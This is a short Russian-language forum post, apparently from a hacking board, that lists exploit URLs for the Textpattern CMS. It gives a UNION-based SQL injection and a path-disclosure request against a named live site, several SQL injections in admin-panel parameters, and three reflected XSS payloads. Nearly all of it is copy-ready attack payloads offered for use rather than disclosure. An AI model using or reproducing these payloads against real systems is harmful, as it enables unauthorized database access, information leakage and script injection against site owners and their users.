Эх, увидел CMS до этой темы, всё уже найдено. (

Впрочем, вот что ещё можно добавить к сказанному выше:

SQL-иньекция(обычная)
http://pek.zp.ua/atom/?id=-1+union+select+version%28%29

Вывод в заголовке

SQL-иньекции в админке:

Код:

http://txtpattern/textpattern/index.php?event=article&step=edit&ID=-4+union+select+1,2,3,4,5,6,7,8,9,version%28%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38

Код:

http://txtpattern/textpattern/index.php?event=link&step=link_edit&id=-2+union+select+1,2,3,4,5,6,7

Код:

http://txtpattern/textpattern/index.php?event=category&step=cat_article_edit&id=-5+union+select+1,2,3,4,5,6,7

Раскрытие путей:
http://pek.zp.ua/?q[]=

Также максимально подробная информация о сайте доступна из админской панели
../textpattern/index.php?event=diag

Ну и несколько XSS-ок для админа:

(все в админской панели)

Код:

http://txtpattern/textpattern/index.php?event=log&step=list&page=2%22%3E%3CsCript%3Eprompt%28%27%27%29;%3C/sCript%3E

Код:

http://txtpattern/textpattern/index.php?event=tag&name=image&id=1%27&ext=.gif&alt=&h=1&w=400%22%3C/textarea%3E%3E%3CscRipt%3Eprompt%28%27%27%29;%3C/sCript%3E&type=xhtml

Код:

http://txtpattern/textpattern/index.php?event=page&name=%3Cscript%3Eprompt%28%27%27%29;%3C/sCript%3E